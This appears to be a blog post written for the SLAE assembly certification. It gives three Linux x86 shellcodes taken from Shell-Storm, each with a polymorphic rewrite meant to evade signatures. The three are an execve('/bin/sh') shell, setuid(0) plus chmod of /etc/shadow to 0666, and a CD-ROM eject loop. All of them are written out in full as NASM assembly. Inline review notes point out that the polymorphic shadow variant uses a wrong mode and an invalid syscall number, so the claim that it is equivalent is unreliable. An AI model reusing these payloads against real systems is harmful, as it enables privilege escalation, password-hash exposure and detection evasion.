

SLAE – Assignment #6: Polymorphic Shellcode

Posted by: voidsec


Assignment #6: Polymorphic Shellcode

The sixth SLAE assignment requires creating three different polymorphic versions of shellcodes published on Shell-Storm.

I decided to work on these three:

As always, all the code is also available on GitHub.

execve (“/bin/sh”)

Original:

; http://shell-storm.org/shellcode/files/shellcode-752.php
; Equivalent C: execve("//bin/sh", NULL, NULL)
; Target: x86-32 Linux, Intel/NASM syntax, int 0x80 ABI
; Register roles at the syscall: eax = number, ebx = path, ecx = argv, edx = envp
; No return-value check: if execve fails the code falls off the end.

xor ecx, ecx            ; ecx = 0 -> argv = NULL; also the multiplier for the next line
mul ecx                 ; edx:eax = eax * 0 -> eax = 0 and edx = 0 (envp = NULL)
push ecx                ; NUL terminator for the path string
push 0x68732f2f   ;; hs//  -> "//sh" once read little-endian
push 0x6e69622f   ;; nib/  -> "/bin"; the stack now holds "//bin/sh\0"
mov ebx, esp            ; ebx = pointer to the path
mov al, 11              ; 11 = __NR_execve (i386); writes only al, bits 8-31 are already 0 from mul
int 0x80

Polymorphic:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; Equivalent C: execve("//bin/sh", NULL, NULL) — same behaviour as shellcode-752 above,
; with the path loaded through edi/esi and the terminator pushed from eax.
; Target: x86-32 Linux, Intel/NASM syntax, int 0x80 ABI (eax = nr, ebx = path, ecx = argv, edx = envp)
; mul ecx: edx:eax = eax * ecx; with ecx = 0 this clears both eax and edx in one instruction
xor ecx, ecx            ; ecx = 0 -> argv = NULL
mul ecx                 ; eax = 0, edx = 0 -> envp = NULL
push eax                ; NUL terminator (eax is 0 here)
mov edi, 0x68732f2f     ; "//sh"
mov esi, 0x6e69622f     ; "/bin"
push edi
push esi                ; stack now holds "//bin/sh\0"
mov ebx, esp            ; ebx = pointer to the path
mov al, 0xb             ; 0xb = 11 = __NR_execve (i386); bits 8-31 of eax are 0 from mul
int 0x80

Diff:

  • original size: 21 bytes
  • polymorphic size: 23 bytes [OK] (max size: 31.5 bytes)
  • +9.52%

setuid(0) + chmod(“/etc/shadow”,0666)

Original:

; http://shell-storm.org/shellcode/files/shellcode-624.php
; Equivalent C: setuid(0); chmod("//etc/shadow", 0666); exit(1);
; Target: x86-32 Linux, Intel/NASM syntax, int 0x80 ABI
; No return value is checked: each call silently assumes the previous one succeeded
; (see the comments on "mov al" and "inc eax" for where that assumption is load-bearing).


xor    ebx, ebx         ; ebx = 0 -> uid argument
mov    al, 0x17         ; 0x17 = 23 = __NR_setuid (i386); only al is written, so bits 8-31 of eax are assumed to be 0 on entry
int    0x80             ; setuid(0)
xor    eax,eax
push   eax              ; NUL terminator for the path
push   0x776f6461       ; "adow"
push   0x68732f63       ; "c/sh"
push   0x74652f2f       ; "//et" -> the stack now holds "//etc/shadow\0"
mov    ebx, esp         ; ebx = pointer to the path
mov    cx, 0x1b6        ; 0x1b6 = 0666 octal = mode; only the low 16 bits of ecx are written and ecx was never cleared,
                        ; so bits 16-31 are stale — presumably harmless because the kernel masks the mode to 07777 (verify)
mov    al, 0xf          ; 0xf = 15 = __NR_chmod; relies on eax being 0 from the xor above
int    0x80             ; chmod(path, mode) -> eax = 0 on success, -errno on failure
inc    eax              ; assumes chmod returned 0 so eax becomes 1 = __NR_exit; on failure eax = -errno + 1, which is not exit
int    0x80             ; exit(1) in the success case (ebx still holds the path pointer, so the status is that address, not a clean 0)

Polymorphic:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; Intended as a polymorphic equivalent of shellcode-624 above:
; setuid(0); chmod("//etc/shadow", 0666); exit(1) — x86-32 Linux, Intel/NASM syntax, int 0x80 ABI
; NOTE(review): two lines below do not reproduce the original's register values — see the
; comments on "add ecx, -219" and "mov eax, 0xffffffff". The byte-count diff further down only
; compares sizes; a trace of the syscalls actually issued should be confirmed before calling
; this variant equivalent.

xor ebx, ebx            ; ebx = 0 -> uid argument
push 0x17               ; 0x17 = 23 = __NR_setuid; push/pop writes all 32 bits of eax, unlike the original's "mov al"
pop eax
int 0x80                ; setuid(0)
xor eax,eax
push eax                ; NUL terminator for the path
mov eax, 0x776f6461     ; "adow"
push eax
mov eax, 0x68732f63     ; "c/sh"
push eax
mov eax, 0x74652f2f     ; "//et" -> the stack now holds "//etc/shadow\0"
push eax
mov ebx, esp            ; ebx = pointer to the path
mov ecx, -219           ; ecx = -219
add ecx, -219           ; ecx = -438 = 0xfffffe4a; the original passes 0x1b6 (= +438, octal 0666),
                        ; so after the kernel's 07777 mask this is a different mode, not 0666 (confirm by tracing)
mov eax, 0xffffffff     ; eax = -1 as the syscall number; the original uses 0xf (__NR_chmod). An out-of-range
                        ; number is rejected by the kernel with -ENOSYS, so no chmod appears to take place here (confirm)
int 0x80
inc eax                 ; intended to turn chmod's 0 into 1 = __NR_exit; with eax = -ENOSYS this yields another invalid number
int 0x80

Diff:

  • original size: 37 bytes
  • polymorphic size: 51 bytes [OK] (max size: 55.5 bytes)
  • +37.83%

open cd-rom loop (follows “/dev/cdrom” symlink)

Original:

; http://shell-storm.org/shellcode/files/shellcode-231.php
; Equivalent C: fd = open("///dev/cdrom", O_NONBLOCK); for (;;) ioctl(fd, CDROMEJECT);
; Target: x86-32 Linux, Intel/NASM syntax, int 0x80 ABI
; Never terminates, and neither open() nor ioctl() has its return value checked.


push 0x5                ; 5 = __NR_open; push/pop sets all 32 bits of eax
pop eax
xor ecx,ecx
push ecx                ; NUL terminator for the path
mov ch, 0x8             ; ecx = 0x800 = O_NONBLOCK -> open flags (ecx was zeroed, so the other bits are 0)
push 0x6d6f7264         ; "drom"
push 0x632f7665         ; "ev/c"
push 0x642f2f2f         ; "///d" -> the stack now holds "///dev/cdrom\0"
mov ebx, esp            ; ebx = pointer to the path
int 0x80                ; eax = fd on success, -errno on failure
mov ebx, eax            ; ebx = fd; an error value is passed on to ioctl unchecked
mov cx, 0x5309          ; 0x5309 = CDROMEJECT request; overwrites the 0x08 in ch, bits 16-31 of ecx stay 0

openit:
 mov al, 0x36           ; 0x36 = 54 = __NR_ioctl; writes only al, so this relies on bits 8-31 of eax being 0 —
                        ; true for a small fd and after an ioctl that returned 0, not after one that returned -errno
 int 0x80               ; ioctl(fd, CDROMEJECT)
 jmp openit             ; unconditional: loops forever

Polymorphic:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; Polymorphic equivalent of shellcode-231 above:
; fd = open("///dev/cdrom", O_NONBLOCK); for (;;) ioctl(fd, CDROMEJECT);
; Target: x86-32 Linux, Intel/NASM syntax, int 0x80 ABI
; Never terminates; open() and ioctl() return values are not checked.

push 0x5                ; 5 = __NR_open
pop eax
xor ecx,ecx
push ecx                ; NUL terminator for the path
mov ch, 0x8             ; ecx = 0x800 = O_NONBLOCK -> open flags
mov edi, 0x6d6f7264     ; "drom"
push edi
mov edi, 0x632f7665     ; "ev/c"
push edi
mov edi, 0x642f2f2f     ; "///d" -> the stack now holds "///dev/cdrom\0"
push edi
mov ebx, esp            ; ebx = pointer to the path
int 0x80                ; eax = fd on success, -errno on failure
xchg eax, ebx           ; ebx = fd (eax receives the old path pointer, which is overwritten in the loop anyway)
mov cx, 0x5309          ; 0x5309 = CDROMEJECT request; replaces the 0x08 in ch, bits 16-31 of ecx stay 0
openit:
 push 0x36              ; 0x36 = 54 = __NR_ioctl; push/pop rewrites all of eax each iteration,
                        ; so unlike the original's "mov al" a negative ioctl return does not poison the next number
 pop eax
 int 0x80               ; ioctl(fd, CDROMEJECT)
 jmp openit             ; unconditional: loops forever

Diff:

  • original size: 39 bytes
  • polymorphic size: 42 bytes [OK] (max size: 58.5 bytes)
  • +7.69%

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511
